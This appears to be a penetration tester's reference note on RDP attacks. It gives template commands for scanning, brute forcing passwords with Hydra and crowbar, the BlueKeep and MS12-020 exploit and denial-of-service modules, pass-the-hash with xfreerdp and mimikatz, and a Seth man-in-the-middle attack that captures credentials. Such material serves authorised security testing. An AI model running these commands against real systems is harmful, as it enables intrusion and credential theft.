Overview

The Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run a RDP server software.

RDP authentication mechanism rely on Windows local or Active Directory domain credentials.

Network Level Authentication NLA

RDP may uses Network Level Authentication (NLA), introduced in RDP 6.0 and supported initially in Microsoft Windows Vista / Windows Server 2008, which requires the connecting user to authenticate before a session is established with the server and prevents the use of resources on the server from the load of the graphical login screen.

Restricted Admin mode

The Restricted Admin mode is a security feature introduced in the Microsoft Windows 8.1 and Server 2012 R2 operating systems. The feature has been backported to Windows 7 and Server 2008.

Restricted Admin mode prevents the connecting user's credentials to be stored on the remote host by transforming the logon to a network logon (Type 3) instead of a remote interactive logon (Type 10). Indeed, for remote interactive logon, the plaintext password is provided and the user's credentials are stored in the LSASS process of the remote host. In Restricted Admin mode, no form of credentials (plaintext password, LM / NTLM hashes or kerberos TGT) are stored on the remote host.

Restricted Admin mode must be enabled on the remote host (DisableRestrictedAdmin registry key to (REG_DWORD) 0 which is not the case by default) and the client must connect in Restricted Admin mode (for example: mstsc.exe /restrictedAdmin). Note that enabling Restricted Admin mode allow Pass-the-hash authentication over RDP.

Only members of the local Administrators group may authenticate in Restricted Admin mode and the network identity (for remote access over the network) of the RDP session will, by default, be authenticated using the RDP host machine account. This authentication using the RDP host machine account can be disabled by setting the DisableRestrictedAdminOutboundCreds registry key to (REG_DWORD) 1.

Network scan

Nmap and the Metasploit's auxiliary/scanner/rdp/rdp_scanner module can be used to scan the network for RDP services.

Nmap's service and default RDP scripts scan may allow for the retrieval of information about the hosts (NetBIOS / DNS hostname, Windows product version, SSL / TLS subject and issuer, etc.). Metasploit's auxiliary/scanner/rdp/rdp_scanner module will check whether or not NLA is enabled.

nmap -n -Pn -v -p 3389 -sV -sC -oA <NMAP_OUTPUT> <RANGE | CIDR>

msf > use auxiliary/scanner/rdp/rdp_scanner
msf auxiliary(scanner/rdp/rdp_scanner) > set RHOSTS <HOSTNAME | IP | CIDR | file:<PATH>>

Authentication brute force

The local or Active Directory domain account lockout policies apply (depending on the type of authentication tried) when connecting in RDP. Vertical brute forcing may thus not be possible.

However, horizontal RDP brute forcing can be used for lateral movement once an account has been compromised. Indeed, the compromised account may not be a member of the local Administrators group (and thus can not connect through PsExec like tool for example) but can be a member of the Remote Desktop Users group.

Patator, Hydra or the crowbar Python Script can be used to brute force RDP access. Patator and crowbar both support NLA (as of December 2018, Hydra does not support no NLA RDP brute force).

python crowbar.py -b rdp (-u <USERNAME | <DOMAIN\\USERNAME> | -U USERNAME_FILE) (-c <PASSWORD> | -C <PASSWORDS_LIST) -s <CIDR>

hydra -t 1 -V -l <USERNAME> (-p <PASSWORD> | -P <PASSWORDS_LIST) rdp://<IP | HOST>

Known vulnerabilities

nmap can be used to check for the CVE-2012-0002 / MS12-020 exploit. The Metasploit's auxiliary/scanner/rdp/cve_2019_0708_bluekeep module and rdpscan can be used to scan for BlueKeep / CVE-2019-0708.

# BlueKeep CVE-2019-0708
msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
# set RHOSTS file:<PATH>
# set THREADS <THREADS_NUMBER>

rdpscan.exe --file E:\Keolis\1-Wales\1-Pentest\hosts\IP.txt

# CVE-2012-0002 / MS12-020
nmap -v -p 3389 --script rdp-vuln-ms12-020 <HOST>
msf> use auxiliary/scanner/rdp/ms12_020_check

BlueKeep CVE-2019-0708

An heap corruption can occur in the RDP protocol that allows for arbitrary code execution at the system level pre-authentication.

Microsoft identified the following Windows versions as vulnerable:

• Windows XP

• Windows Vista

• Windows 7

• Windows Server 2003

• Windows Server 2008

• Windows Server 2008 R2

Windows versions newer than Windows 7 and Windows Server 2012 are not vulnerable.

The Metasploit module exploit/windows/rdp/cve_2019_0708_bluekeep_rce can be used to exploit the vulnerability. Note that the exploit is not yet polished.

msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

CVE-2012-0002 / MS12-020

The CVE-2012-0002 / MS12-020 vulnerability can be used both to realize a Denial Of Service and remotely execute code on the target.

The Metasploit's auxiliary/dos/windows/rdp/ms12_020_maxchannelids may be used to realize a DoS of the target:

msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

As of December 2018, no public proof-of-concept code that results in remote code execution is available.

RDP clients

Windows

On Windows, the default Microsoft Remote Desktop (mstsc.exe) application ("Connexion Bureau à distance") or the Remote Desktop Manager and mRemoteNG third parties applications can be used as RDP clients.

The Remote Desktop Manager and mRemoteNG clients allow for the configuration and storing of multiples RDP connections (host and authentication information). A free edition of Remote Desktop Manager is available as well as a commercial grade enterprise edition.

Linux

On Linux, FreeRDP (xfreerdp), rdesktop or Remmina (GUI) can be used as RDP clients.

# xfreerdp.

xfreerdp [/size:<SCREEN_SIZE_PERCENT>%] /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>[:<PORT>]

# Disables NLA for host that do not require Network Level Authentication.
xfreerdp -sec-nla /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>

# Connection in restricted admin mode.
xfreerdp /restricted-admin /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /p:'<PASSWORD>' /v:<HOSTNAME | IP>

# For RD Web Access through a Remote Desktop gateway.
# The <RDP_FILE> corresponds to the RDP client configuration file retrieved from the RD Web Access web interface.
xfreerdp <RDP_FILE> /d:<DOMAIN | WORKGROUP> /u:<USERNAME> /p:'<PASSWORD>' /gt:rpc

# rdesktop.
rdesktop -d '<DOMAIN | WORKGROUP>' -u '<USERNAME>' <HOSTNAME | IP>[:<PORT>]

Pass-the-hash over RDP

The xfreerdp client on Linux and mimikatz with the built-in mstsc.exe client on Windows can be used to authenticate using an account's NTLM hash through RDP. The remote hosts must support the Restricted Admin mode feature.

# Linux.
xfreerdp /u:'<DOMAIN | WORKGROUP>\<USERNAME>' /pth:<HASH> /v:<HOSTNAME | IP>

# Windows.
# The Remote Desktop Connection (mstsc.exe) client will display the currently logged user information but the network connection will be established using the identity specified to mimikatz's sekurlsa::pth.
sekurlsa::pth /domain:<. | DOMAIN_FQDN> /user:<USERNAME> /ntlm:<NT_HASH> /run:"mstsc.exe /restrictedadmin"

Man-in-the-middle attack

Seth is a tool written in Python and Bash to MitM RDP connections that attempts to downgrade the connection in order to extract clear text credentials.

Seth can be used regardless if Network Level Authentication (NLA) is enabled or not on the targeted RDP host.

Seth will notably:

• Spoof ARP replies to redirect traffic from the victim host to the attacker machine and then to the target RDP server.

• Configure an iptable rule to reject SYN packet to prevent direct RDP authentication.

• Clone the SSL certificate (only replacing the public key and signature)

• Block traffic to port 88 to downgrade Kerberos authentication to NTLM.

Note that the user will be presented with a certificate error warning that must be accepted before the clear text credentials are sent.

In case of a successful attack:

• Clear text credentials of the user login in are obtained

• A command can be executed on the targeted host

• Victim keyboard inputs are retrieved

# Unless the RDP host is on the same subnet as the victim machine, the last IP address must be that of the gateway.
# The COMMAND is executed on the RDP host by simulating WIN+R
# The COMMAND should not contains special characters (powershell -enc <STRING> can be used)

seth.sh <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP | HOST_IP> [<COMMAND>]

Session Hijacking

If Administrator / NT AUTHORITY\SYSTEM privileges could be obtained on a host, RDP sessions of others users can be hijacked. This could be used to access the host as the hijacked user through a GUI interface with out knowing its password.

To hijack RDP session refer to the [Windows] Post Exploitation note.